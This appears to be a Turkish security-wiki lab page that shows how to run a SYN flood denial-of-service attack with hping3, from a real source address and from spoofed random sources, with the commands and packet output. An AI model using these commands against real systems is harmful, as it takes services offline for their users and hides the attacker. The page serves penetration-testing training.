Gerçek/Sahte IP Adresleri Kullanarak SYN Flood Saldırısı Gerçekleştirme

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Hedef sisteme gerçek ve sahte IP adreslerinden gelen SYN Flood saldırısını gerçekleştirerek sistem veya servisin devre dışı kalmasını sağlamak. Syn Flood saldırılarında kullanılacak bir çok araç mevcuttur. Bu uygulamada kullanımı en yaygın ve en kolay olan araçlardan biri olan hping aracı kullanılacaktır.

Araç:

  • hping

Lab Senaryosu:

Hping aracı ile SYN bayraklı TCP paketleri üretilir. Kaynak IP adresleri gerçek ve sahte olacak şekilde saldırı gerçekleştirilecektir.

İlk olarak gerçek IP adresi ile saldırı için hedefe normal SYN paketi gönderilir.

root@kali:~# hping3 -S -p 80 bga.com.tr -c 5
HPING bga.com.tr (eth1 50.22.202.162): S set, 40 headers + 0 data bytes

--- bga.com.tr hping statistic ---
5 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

İkinci adımda kaynak adresi rastgele üretmek için ise sahte SYN paketleri aşağıdaki gibi hedefe gönderilir.

root@bgakali:/home/pentest# hping3 -S -p 80 bga.com.tr -c 5 --rand-source
HPING bga.com.tr (eth0 50.22.202.163): S set, 40 headers + 0 data bytes
len=44 ip=50.22.202.163 ttl=53 DF id=4008 sport=80 flags=SA seq=0 win=0 rtt=129.2 ms
len=44 ip=50.22.202.163 ttl=53 DF id=31310 sport=80 flags=SA seq=1 win=0 rtt=129.6 ms
len=44 ip=50.22.202.163 ttl=53 DF id=56915 sport=80 flags=SA seq=2 win=0 rtt=130.7 ms
len=44 ip=50.22.202.163 ttl=53 DF id=20080 sport=80 flags=SA seq=3 win=0 rtt=131.5 ms
len=44 ip=50.22.202.163 ttl=52 DF id=44881 sport=80 flags=SA seq=4 win=0 rtt=124.4 ms